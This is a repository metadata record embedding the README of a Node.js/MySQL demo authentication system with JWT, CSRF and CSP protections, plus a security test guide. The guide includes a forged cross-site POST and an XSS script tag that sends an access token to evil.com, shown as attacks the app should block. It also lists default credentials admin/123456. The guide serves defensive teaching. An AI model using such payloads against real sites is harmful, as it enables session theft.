{"id":29509798,"url":"https://github.com/nabeelabbaxi/secure-auth-system-nodejs","last_synced_at":"2026-04-07T08:32:26.883Z","repository":{"id":304801148,"uuid":"1019568712","full_name":"nabeelabbaxi/secure-auth-system-nodejs","owner":"nabeelabbaxi","description":"Secure full-stack auth system using Node.js, MySQL, JWT, CSRF, and HTTPS","archived":false,"fork":false,"pushed_at":"2025-07-15T08:23:40.000Z","size":1754,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-08-30T17:47:23.604Z","etag":null,"topics":["authentication","csrf-protection","express","jwt","jwt-authentication","mysql","nodejs","secure-auth","security"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nabeelabbaxi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-07-14T14:26:36.000Z","updated_at":"2025-07-15T08:24:22.000Z","dependencies_parsed_at":"2025-07-15T20:04:37.841Z","dependency_job_id":"885bb6f5-792d-4d18-afeb-68ad9a6cd700","html_url":"https://github.com/nabeelabbaxi/secure-auth-system-nodejs","commit_stats":null,"previous_names":["nabeelabbaxi/secure-auth-system-nodejs"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/nabeelabbaxi/secure-auth-system-nodejs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nabeelabbaxi","download_url":"https://codeload.github.com/nabeelabbaxi/secure-auth-system-nodejs/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31506562,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-07T03:10:19.677Z","status":"ssl_error","status_checked_at":"2026-04-07T03:10:13.982Z","response_time":105,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["authentication","csrf-protection","express","jwt","jwt-authentication","mysql","nodejs","secure-auth","security"],"created_at":"2025-07-16T07:25:24.509Z","updated_at":"2026-04-07T08:32:26.875Z","avatar_url":"https://github.com/nabeelabbaxi.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Secure Auth System (Node.js + MySQL + JWT + CSRF + HTTPS)\n\nA full-stack secure authentication and CRUD system using:\n\n- Node.js (Express)\n- MySQL (via XAMPP)\n- JWT (Access + Refresh Tokens)\n- Double Submit Cookie CSRF Protection\n- HTTPS (via mkcert)\n- Secure HTTP-only Cookies\n- CSP Headers\n- SweetAlert, Bootstrap UI\n- Token Expiry Countdown\n- Full Security Test Guide\n\n---\n\n## Project Structure\n```text\nsecure-auth-system-nodejs/\n│\n├── backend/\n│   ├── .env               # Environment variables (DB + secrets)\n│   ├── server.js          # Express HTTPS server\n│   ├── db.js              # MySQL DB connection\n│   ├── auth.js            # JWT token generators\n│   └── package.json       # Dependencies (express, mysql2, bcrypt, etc.)\n│\n├── certs/\n│   ├── cert.pem           # HTTPS cert (mkcert)\n│   └── key.pem            # HTTPS private key (mkcert)\n│\n├── frontend/\n│   ├── index.html         # UI: login, dashboard, product CRUD\n│   ├── script.js          # Logic: token flow, UI updates\n│   └── secure_auth.sql    # SQL: Create DB, tables, sample data\n```\n\n---\n\n## 1. Prerequisites\n\n- Node.js \u0026 npm installed\n- MySQL (use XAMPP or standalone)\n- mkcert to generate local HTTPS certificates\n- http-server for frontend serving over HTTPS\n\n---\n\n## 2. Setup Backend\n\n### Install Dependencies\n\n```bash\ncd backend/\nnpm install\n```\n\n.env Template\nCreate backend/.env:\n```\nDB_HOST=localhost\nDB_USER=root\nDB_PASSWORD=\nDB_NAME=secure_auth\nACCESS_TOKEN_SECRET=access_secret_example\nREFRESH_TOKEN_SECRET=refresh_secret_example\n```\n\n---\n\n## 3. Setup Database\nOpen XAMPP → Start MySQL\n\nImport SQL file via phpMyAdmin or CLI:\n- Use frontend/secure_auth.sql\n\nThis creates:\n\n- users table (with hashed password)\n- products table (sample products)\n\n---\n\n## Default Credentials\n\n- Username: `admin`\n- Password: `123456`\n\nUse these credentials to log in after initial setup. Change them in the database for production use.\n\n---\n\n## 4. Generate HTTPS Certificates\n\nInstall mkcert\nOn Windows (via Chocolatey):\n```\nchoco install mkcert\n```\nOn macOS:\n```\nbrew install mkcert\nbrew install nss  # Firefox support\n```\nThen run:\n\nCreate Certificates\nFrom the project root:\n```\nmkdir certs\nmkcert -key-file ./certs/key.pem -cert-file ./certs/cert.pem localhost 127.0.0.1\n```\n\n---\n\n## 5. Start Backend Server (HTTPS)\n```\ncd backend/\nnode server.js\n```\nServer runs at: https://localhost:3007\n\n---\n\n## 6. Open Frontend (HTTPS)\nServe frontend via HTTPS using http-server\n```\nnpm install -g http-server\n```\nFrom inside the frontend/ folder:\n```\nhttp-server -S -C ../certs/cert.pem -K ../certs/key.pem -p 5500\n```\nVisit in browser:\nhttps://127.0.0.1:5500/\n\nFully secure HTTPS for both frontend and backend.\n\n---\n\n## 7. Security Layers Implemented\n\n| Layer               | Description                                                      |\n| ------------------- | ---------------------------------------------------------------- |\n| JWT                 | Access (20s) + Refresh (60s) via HTTP-only cookies               |\n| CSRF                | Double Submit Cookie pattern with custom header (x-csrf-token)    |\n| CSP                 | Content-Security-Policy: blocks inline scripts, external origins  |\n| XSS Protection      | CSP + no inline JS + no eval()                                   |\n| SameSite=Strict     | Prevents cross-site cookies from being sent unintentionally      |\n\n---\n\n## 8. Simulate Security Tests\n\n1. Unauthorized Access\n```\ncurl -X GET https://localhost:3007/products\n# Should return 401 (no token)\n```\n\n2. Access Token Expiry\nWait 20s after login\n\nTry CRUD action\n\nIt will auto-refresh via /refresh and retry the request\n\n3. Refresh Token Expiry\nWait 60s after login\n\nTry any request\n\nSession expires\n\nYou’re logged out automatically\n\n4. CSRF Test\nTry running this in browser console (not your app tab):\n```js\nfetch('https://localhost:3007/products', {\n  method: 'POST',\n  credentials: 'include',\n  headers: {\n    'Content-Type': 'application/json',\n    'x-csrf-token': 'fake-token'\n  },\n  body: JSON.stringify({ name: 'MaliciousProduct', price: 0 })\n});\n```\nShould return 403 Forbidden (invalid CSRF token)\n\n5. XSS Simulation\nTry injecting script in product name:\n```html\n\u003cscript\u003efetch('https://evil.com?token=' + localStorage.getItem('access_token'))\u003c/script\u003e\n```\nWill not work:\n\n- No localStorage tokens\n- CSP blocks inline JS\n\n---\n\n## 9. Features\n\n- Secure login with hashed passwords (bcrypt)\n- Fully HTTPS secured with trusted certs\n- Auto token refresh logic with countdown timers\n- SweetAlert feedback for users\n- CSP headers to prevent inline/injected scripts\n- Ready-to-use with minimum setup\n\n---\n\n## 10. Testing Tips\n\n- Use Chrome/Firefox in incognito mode\n- Watch browser DevTools → Application → Cookies\n- Use console.log to trace token and CSRF logic\n- Try simulating attacker behavior in separate tabs or domains\n\n---\n\n## 11. Possible Enhancements\n\n- Server-side CSRF token storage (more secure)\n- Token revocation (blacklist DB)\n- Role-based authorization\n- User registration UI\n- Rate limiting\n\n---\n\n## License\nMIT License – Free to use, modify, and share.\n\n---\n\n## Author\nBuilt by Nabeel Abbasi with a focus on API security and beginner-friendly demos.\nStar the repo if you found it useful.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnabeelabbaxi%2Fsecure-auth-system-nodejs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnabeelabbaxi%2Fsecure-auth-system-nodejs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnabeelabbaxi%2Fsecure-auth-system-nodejs/lists"}